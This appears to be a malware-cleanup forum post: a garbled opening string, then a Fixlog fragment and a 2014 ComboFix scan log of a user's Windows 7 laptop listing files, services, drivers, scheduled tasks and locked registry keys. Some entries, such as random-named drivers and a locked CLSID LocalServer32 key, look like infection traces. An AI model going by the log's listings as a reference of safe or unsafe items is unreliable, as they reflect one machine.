4t4w!+639V[2"V8!jx5o]V":,H]U.!52I24+X54+V![MjXF/4x5j$8m+.H\.q;\MX/qA148MX(Cl38f9pms1L5?3kF!N0qAbGTBlN!.(p.Z/ Tx*N!#((#!k 8.B(x5yH^!k Fj98x5y\sZ/8#9(xp.\s!aq;t8? XZjuIHp?0wFj0E? Xy4+Y^F;IAdZ"hSGbk\ZShFKD,e+w!5y4G6KY^n!VZB*#bJIn{l I!U`a_E~b+6~yx-)mEB!S8#p8mmY14`#`8)i^sK/+vbijxcoAA==^#~@

HKEY_USERS\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\

========= End of Reg: =========

===================================
Permissions for "HKEY_USERS\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}":

Owner: BUILTIN\Administrators

DACL(PAI):

BUILTIN\Administrators ALLOW FULL (NI)
BUILTIN\Administrators ALLOW FULL (OI-CI-IO)
NT AUTHORITY\SYSTEM ALLOW FULL (NI)
NT AUTHORITY\SYSTEM ALLOW FULL (OI-CI-IO)
BUILTIN\Users ALLOW READ (NI)
BUILTIN\Users ALLOW READ (OI-CI-IO)

===================================

==== End of Fixlog ====

 

 

 

COMBOFIX 11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

 

 

ComboFix 14-07-16.02 - Ric 07/17/2014   8:48.2.8 - x64
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.8180.6348 [GMT -4:00]
Running from: c:\users\Ric\Desktop\ComboFix.exe
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Created a new restore point
.
.
(((((((((((((((((((((((((   Files Created from 2014-06-17 to 2014-07-17  )))))))))))))))))))))))))))))))
.
.
2014-07-17 12:59 . 2014-07-17 12:59 -------- d-----w- c:\users\TEMP.Dell-XPS-1645\AppData\Local\temp
2014-07-17 12:59 . 2014-07-17 12:59 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-07-16 14:48 . 2014-07-17 12:41 -------- d-----w- C:\FRST
2014-07-14 16:08 . 2014-07-14 17:27 -------- d-----w- c:\windows\SysWow64\wbem\Performance
2014-07-14 15:20 . 2014-07-14 15:20 -------- d-----w- C:\RegBackup
2014-07-14 13:20 . 2014-07-14 13:20 -------- d-----w- c:\program files (x86)\Tweaking.com
2014-07-11 19:19 . 2014-07-11 19:19 -------- d-----w- c:\windows\ERUNT
2014-07-11 18:58 . 2014-07-12 17:01 -------- d-----w- C:\Kits
2014-07-06 18:20 . 2010-08-30 12:34 536576 ----a-w- c:\windows\SysWow64\sqlite3.dll
2014-07-06 18:17 . 2014-07-13 18:11 -------- d-----w- C:\AdwCleaner
2014-07-06 18:15 . 2014-07-06 18:15 -------- d-----w- c:\users\Ric\AppData\Local\GHISLER
2014-07-06 15:47 . 2014-07-14 15:00 122584 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-07-06 15:46 . 2014-07-06 15:46 -------- d-----w- c:\program files (x86)\Malwarebytes Anti-Malware
2014-07-06 15:46 . 2014-07-06 15:46 -------- d-----w- c:\programdata\Malwarebytes
2014-07-06 15:46 . 2014-05-12 11:26 63704 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-07-06 15:46 . 2014-05-12 11:26 91352 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-07-06 15:46 . 2014-05-12 11:25 25816 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-07-05 18:22 . 2014-07-09 19:33 -------- d-----w- c:\users\roy
2014-07-05 16:52 . 2014-07-13 17:30 -------- d-----w- C:\Roy
2014-06-25 23:54 . 2014-06-26 00:02 -------- d-----w- c:\users\Ric\AppData\Roaming\Feeqvena
2014-06-25 23:50 . 2014-07-06 17:39 -------- d-----w- c:\programdata\IculOnse
2014-06-18 13:49 . 2014-06-18 13:49 -------- d-----w- c:\programdata\Package Cache
2014-06-18 13:48 . 2014-06-18 13:48 -------- d-----w- C:\TDSSKiller_Quarantine
2014-06-18 13:47 . 2014-06-18 13:47 -------- d-----w- C:\AMD
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-07-16 23:35 . 2012-03-31 15:56 699056 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2014-07-16 23:35 . 2011-05-18 19:14 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-06-11 11:40 . 2011-02-26 01:47 95414520 ----a-w- c:\windows\system32\MRT.exe
2014-06-03 20:51 . 2011-02-26 06:12 18960 ----a-w- c:\windows\system32\drivers\LNonPnP.sys
2014-05-30 10:21 . 2014-06-11 11:33 23414784 ----a-w- c:\windows\system32\mshtml.dll
2014-05-30 10:02 . 2014-06-11 11:33 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-05-30 10:02 . 2014-06-11 11:33 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-05-30 09:45 . 2014-06-11 11:33 2768384 ----a-w- c:\windows\system32\iertutil.dll
2014-05-30 09:39 . 2014-06-11 11:33 548352 ----a-w- c:\windows\system32\vbscript.dll
2014-05-30 09:39 . 2014-06-11 11:33 66048 ----a-w- c:\windows\system32\iesetup.dll
2014-05-30 09:38 . 2014-06-11 11:33 48640 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-05-30 09:28 . 2014-06-11 11:33 51200 ----a-w- c:\windows\system32\jsproxy.dll
2014-05-30 09:27 . 2014-06-11 11:33 33792 ----a-w- c:\windows\system32\iernonce.dll
2014-05-30 09:24 . 2014-06-11 11:33 574976 ----a-w- c:\windows\system32\ieui.dll
2014-05-30 09:21 . 2014-06-11 11:33 139264 ----a-w- c:\windows\system32\ieUnatt.exe
2014-05-30 09:21 . 2014-06-11 11:33 111616 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-05-30 09:20 . 2014-06-11 11:33 752640 ----a-w- c:\windows\system32\jscript9diag.dll
2014-05-30 09:11 . 2014-06-11 11:33 940032 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-05-30 09:08 . 2014-06-11 11:33 5782528 ----a-w- c:\windows\system32\jscript9.dll
2014-05-30 09:06 . 2014-06-11 11:33 452096 ----a-w- c:\windows\system32\dxtmsft.dll
2014-05-30 09:02 . 2014-06-11 11:33 2724864 ----a-w- c:\windows\SysWow64\mshtml.tlb
2014-05-30 08:55 . 2014-06-11 11:33 38400 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-05-30 08:49 . 2014-06-11 11:33 195584 ----a-w- c:\windows\system32\msrating.dll
2014-05-30 08:46 . 2014-06-11 11:33 85504 ----a-w- c:\windows\system32\mshtmled.dll
2014-05-30 08:44 . 2014-06-11 11:33 455168 ----a-w- c:\windows\SysWow64\vbscript.dll
2014-05-30 08:44 . 2014-06-11 11:33 295424 ----a-w- c:\windows\system32\dxtrans.dll
2014-05-30 08:43 . 2014-06-11 11:33 61952 ----a-w- c:\windows\SysWow64\iesetup.dll
2014-05-30 08:42 . 2014-06-11 11:33 51200 ----a-w- c:\windows\SysWow64\ieetwproxystub.dll
2014-05-30 08:35 . 2014-06-11 11:33 608768 ----a-w- c:\windows\system32\ie4uinit.exe
2014-05-30 08:29 . 2014-06-11 11:33 631808 ----a-w- c:\windows\system32\msfeeds.dll
2014-05-30 08:28 . 2014-06-11 11:33 112128 ----a-w- c:\windows\SysWow64\ieUnatt.exe
2014-05-30 08:27 . 2014-06-11 11:33 592896 ----a-w- c:\windows\SysWow64\jscript9diag.dll
2014-05-30 08:24 . 2014-06-11 11:33 1249280 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-05-30 08:23 . 2014-06-11 11:33 2040832 ----a-w- c:\windows\system32\inetcpl.cpl
2014-05-30 08:10 . 2014-06-11 11:33 32256 ----a-w- c:\windows\SysWow64\JavaScriptCollectionAgent.dll
2014-05-30 07:56 . 2014-06-11 11:33 2266112 ----a-w- c:\windows\system32\wininet.dll
2014-05-30 07:56 . 2014-06-11 11:33 4244992 ----a-w- c:\windows\SysWow64\jscript9.dll
2014-05-30 07:50 . 2014-06-11 11:33 1068032 ----a-w- c:\windows\SysWow64\mshtmlmedia.dll
2014-05-30 07:49 . 2014-06-11 11:33 1964544 ----a-w- c:\windows\SysWow64\inetcpl.cpl
2014-05-30 07:43 . 2014-06-11 11:33 13522944 ----a-w- c:\windows\system32\ieframe.dll
2014-05-30 07:30 . 2014-06-11 11:33 1398272 ----a-w- c:\windows\system32\urlmon.dll
2014-05-30 07:21 . 2014-06-11 11:33 1790976 ----a-w- c:\windows\SysWow64\wininet.dll
2014-05-30 07:13 . 2014-06-11 11:33 846336 ----a-w- c:\windows\system32\ieapfltr.dll
2014-05-09 06:14 . 2014-05-14 13:38 477184 ----a-w- c:\windows\system32\aepdu.dll
2014-05-09 06:11 . 2014-05-14 13:38 424448 ----a-w- c:\windows\system32\aeinv.dll
2014-05-08 09:32 . 2014-06-11 11:32 3178496 ----a-w- c:\windows\system32\rdpcorets.dll
2014-05-08 09:32 . 2014-06-11 11:32 16384 ----a-w- c:\windows\system32\RdpGroupPolicyExtension.dll
2014-04-25 02:34 . 2014-06-11 11:32 801280 ----a-w- c:\windows\system32\usp10.dll
2014-04-25 02:06 . 2014-06-11 11:32 626688 ----a-w- c:\windows\SysWow64\usp10.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Green]
@="{95A27763-F62A-4114-9072-E81D87DE3B68}"
[HKEY_CLASSES_ROOT\CLSID\{95A27763-F62A-4114-9072-E81D87DE3B68}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Partial]
@="{E300CD91-100F-4E67-9AF3-1384A6124015}"
[HKEY_CLASSES_ROOT\CLSID\{E300CD91-100F-4E67-9AF3-1384A6124015}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Yellow]
@="{5E529433-B50E-4bef-A63B-16A6B71B071A}"
[HKEY_CLASSES_ROOT\CLSID\{5E529433-B50E-4bef-A63B-16A6B71B071A}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"{90140000-003D-0000-1000-0000000FF1CE}"="del" [X]
.
c:\users\Ric\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Dropbox.lnk - c:\users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe /systemstartup [2014-5-19 33322312]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
"EnableLinkedConnections"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R0 xnvdb;xnvdb;c:\windows\System32\drivers\cixf.sys;c:\windows\SYSNATIVE\drivers\cixf.sys [x]
R1 qnmokglx;qnmokglx;c:\windows\system32\drivers\qnmokglx.sys;c:\windows\SYSNATIVE\drivers\qnmokglx.sys [x]
R1 smvowoli;smvowoli;c:\windows\system32\drivers\smvowoli.sys;c:\windows\SYSNATIVE\drivers\smvowoli.sys [x]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 RoxWatch12;Roxio Hard Drive Watcher 12;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatch13.exe;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatch13.exe [x]
R2 WMCoreService;Mobile Broadband Service;c:\program files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe servicemode;c:\program files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe servicemode [x]
R3 bcbtums;Bluetooth USB LD Filter;c:\windows\system32\drivers\bcbtums.sys;c:\windows\SYSNATIVE\drivers\bcbtums.sys [x]
R3 btusbflt;Bluetooth USB Filter;c:\windows\system32\drivers\btusbflt.sys;c:\windows\SYSNATIVE\drivers\btusbflt.sys [x]
R3 btwampfl;btwampfl;c:\windows\system32\DRIVERS\btwampfl.sys;c:\windows\SYSNATIVE\DRIVERS\btwampfl.sys [x]
R3 btwl2cap;Bluetooth L2CAP Service;c:\windows\system32\DRIVERS\btwl2cap.sys;c:\windows\SYSNATIVE\DRIVERS\btwl2cap.sys [x]
R3 BVRPMPR5a64;BVRPMPR5a64 NDIS Protocol Driver;c:\windows\system32\drivers\BVRPMPR5a64.SYS;c:\windows\SYSNATIVE\drivers\BVRPMPR5a64.SYS [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 McComponentHostService;McAfee Security Scan Component Host Service;c:\program files\McAfee Security Scan\3.8.150\McCHSvc.exe;c:\program files\McAfee Security Scan\3.8.150\McCHSvc.exe [x]
R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x]
R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x]
R3 qrkis;Tether Miniport;c:\windows\system32\DRIVERS\qrkis.sys;c:\windows\SYSNATIVE\DRIVERS\qrkis.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 RoxMediaDB13;RoxMediaDB13;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe [x]
R3 SwitchBoard;Adobe SwitchBoard;c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe;c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TurboBoost;TurboBoost;c:\program files\Intel\TurboBoost\TurboBoost.exe;c:\program files\Intel\TurboBoost\TurboBoost.exe [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S0 PxHlpa64;PxHlpa64;c:\windows\System32\Drivers\PxHlpa64.sys;c:\windows\SYSNATIVE\Drivers\PxHlpa64.sys [x]
S0 Sahdad64;HDD Filter Driver;c:\windows\System32\Drivers\Sahdad64.sys;c:\windows\SYSNATIVE\Drivers\Sahdad64.sys [x]
S0 Saibad64;Volume Filter Driver;c:\windows\System32\Drivers\Saibad64.sys;c:\windows\SYSNATIVE\Drivers\Saibad64.sys [x]
S1 SaibVdAd64;Virtual Disk Driver;c:\windows\system32\Drivers\SaibVdAd64.sys;c:\windows\SYSNATIVE\Drivers\SaibVdAd64.sys [x]
S2 9734BF6A-2DCD-40f0-BAB0-5AAFEEBE1269;Roxio SAIB Service;c:\program files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe;c:\program files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe [x]
S2 AESTFilters;Andrea ST Filters Service;c:\windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe;c:\windows\SYSNATIVE\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 BcmBtRSupport;Bluetooth Driver Management Service;c:\windows\system32\BtwRSupportService.exe;c:\windows\SYSNATIVE\BtwRSupportService.exe [x]
S2 BOT4Service;BOT4Service;c:\program files (x86)\Roxio\BackOnTrack\App\BService.exe;c:\program files (x86)\Roxio\BackOnTrack\App\BService.exe [x]
S2 Fitbit Connect;Fitbit Connect Service;c:\program files (x86)\Fitbit Connect\FitbitConnectService.exe;c:\program files (x86)\Fitbit Connect\FitbitConnectService.exe [x]
S2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [x]
S2 PCPitstop Scheduling;PCPitstop Scheduling;c:\program files (x86)\PCPitstop\PCPitstopScheduleService.exe;c:\program files (x86)\PCPitstop\PCPitstopScheduleService.exe [x]
S2 QDLService2kDell;Qualcomm Gobi 2000 Download Service (Dell);c:\program files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe;c:\program files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe [x]
S2 rimspci;rimspci;c:\windows\system32\DRIVERS\rimspe64.sys;c:\windows\SYSNATIVE\DRIVERS\rimspe64.sys [x]
S2 risdpcie;risdpcie;c:\windows\system32\DRIVERS\risdpe64.sys;c:\windows\SYSNATIVE\DRIVERS\risdpe64.sys [x]
S2 rixdpcie;rixdpcie;c:\windows\system32\DRIVERS\rixdpe64.sys;c:\windows\SYSNATIVE\DRIVERS\rixdpe64.sys [x]
S2 TurboB;Turbo Boost UI Monitor driver;c:\windows\system32\DRIVERS\TurboB.sys;c:\windows\SYSNATIVE\DRIVERS\TurboB.sys [x]
S3 CtClsFlt;Creative Camera Class Upper Filter Driver;c:\windows\system32\DRIVERS\CtClsFlt.sys;c:\windows\SYSNATIVE\DRIVERS\CtClsFlt.sys [x]
S3 ITECIRfilter;ITECIR Filter Driver;c:\windows\system32\DRIVERS\ITECIRfilter.sys;c:\windows\SYSNATIVE\DRIVERS\ITECIRfilter.sys [x]
S3 k57nd60a;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;c:\windows\system32\DRIVERS\k57nd60a.sys;c:\windows\SYSNATIVE\DRIVERS\k57nd60a.sys [x]
S3 netw5v64;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 64 Bit;c:\windows\system32\DRIVERS\netw5v64.sys;c:\windows\SYSNATIVE\DRIVERS\netw5v64.sys [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-06-16 13:09 1091912 ----a-w- c:\program files (x86)\Google\Chrome\Application\35.0.1916.153\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-07-17 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-03-31 23:36]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06 18:24]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06 18:24]
.
2014-07-14 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core.job
- c:\users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe [2011-08-28 15:40]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA.job
- c:\users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe [2011-08-28 15:40]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Green]
@="{95A27763-F62A-4114-9072-E81D87DE3B68}"
[HKEY_CLASSES_ROOT\CLSID\{95A27763-F62A-4114-9072-E81D87DE3B68}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Partial]
@="{E300CD91-100F-4E67-9AF3-1384A6124015}"
[HKEY_CLASSES_ROOT\CLSID\{E300CD91-100F-4E67-9AF3-1384A6124015}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Yellow]
@="{5E529433-B50E-4bef-A63B-16A6B71B071A}"
[HKEY_CLASSES_ROOT\CLSID\{5E529433-B50E-4bef-A63B-16A6B71B071A}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = about:blank
uDefault_Search_URL = hxxp://www.google.com/ie
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: Add to Google Photos Screensa&ver - c:\windows\system32\GPhotos.scr/200
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~1\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\MICROS~1\Office14\ONBttnIE.dll/105
IE: Send image to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
Trusted Zone: dell.com
TCP: DhcpNameServer = 192.168.0.1 205.171.3.26 205.171.2.26
.
- - - - ORPHANS REMOVED - - - -
.
AddRemove-centurytoolbar - c:\program files (x86)\centurytoolbar\uninstall.exe
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-303777)
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_145_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_145_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_145_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_145_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
